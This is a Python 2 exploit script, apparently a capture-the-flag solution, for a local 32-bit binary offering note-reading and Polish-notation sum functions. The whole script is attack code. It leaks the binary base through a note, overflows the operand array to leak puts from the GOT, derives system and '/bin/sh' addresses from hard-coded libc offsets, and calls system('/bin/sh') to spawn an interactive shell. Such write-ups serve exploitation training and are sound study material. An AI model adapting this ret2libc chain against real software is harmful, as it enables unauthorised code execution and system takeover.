|
from minipwn import * |
|
|
|
def read_note(s): |
|
recvuntil(s, '> ') |
|
sendline(s, '1') |
|
recvuntil(s, 'Your note: ') |
|
note = recvline(s) |
|
return note |
|
|
|
def polish_sum(s, operands): |
|
recvuntil(s, '> ') |
|
sendline(s, '2') |
|
recvuntil(s, 'Operator: ') |
|
sendline(s, 'S') |
|
for operand in operands: |
|
recvuntil(s, 'Operand: ') |
|
sendline(s, str(operand)) |
|
recvuntil(s, 'Operand: ') |
|
sendline(s, '.') |
|
recvuntil(s, 'Sum: ') |
|
_sum = recvline(s) |
|
return int(_sum) |
|
|
|
def sign(s, value): |
|
recvuntil(s, '> ') |
|
sendline(s, '5') |
|
sendline(s, str(value)) |
|
|
|
s = connect_process(['./rec_7743d76881fe811335ca25d8b0a3c5f54a21e2f1']) |
|
#raw_input() |
|
|
|
note = read_note(s) |
|
bin_base = u32(note[4:8]) - 0x6fb |
|
print "[+] bin_base = %x" % bin_base |
|
plt_puts = bin_base + 0x520 |
|
got_puts = bin_base + 0x2fd8 |
|
|
|
values = range(0x63) + [plt_puts, got_puts] |
|
polish_sum(s, values) |
|
sign(s, 0) |
|
|
|
""" |
|
$ nm -D /lib32/libc.so.6 | grep -e puts$ -e system$ |
|
0005f140 W puts |
|
0003a940 W system |
|
|
|
$ strings -tx /lib32/libc.so.6 | grep /bin/sh |
|
158e8b /bin/sh |
|
""" |
|
|
|
data = recvline(s) |
|
libc_puts = u32(data[:4]) |
|
print "[+] libc_puts = %x" % libc_puts |
|
libc_system = libc_puts - 0x0005f140 + 0x0003a940 |
|
libc_binsh = libc_puts - 0x0005f140 + 0x158e8b |
|
print "[+] libc_system = %x" % libc_system |
|
print "[+] libc_binsh = %x" % libc_binsh |
|
|
|
def u2s(x): |
|
"""unsigned int to signed int""" |
|
s = struct.pack('<I', x) |
|
return struct.unpack('<i', s)[0] |
|
|
|
values = range(0x63) + [u2s(libc_system), u2s(libc_binsh)] |
|
polish_sum(s, values) |
|
sign(s, 0) |
|
|
|
print "[+] got a shell!" |
|
interact(s) |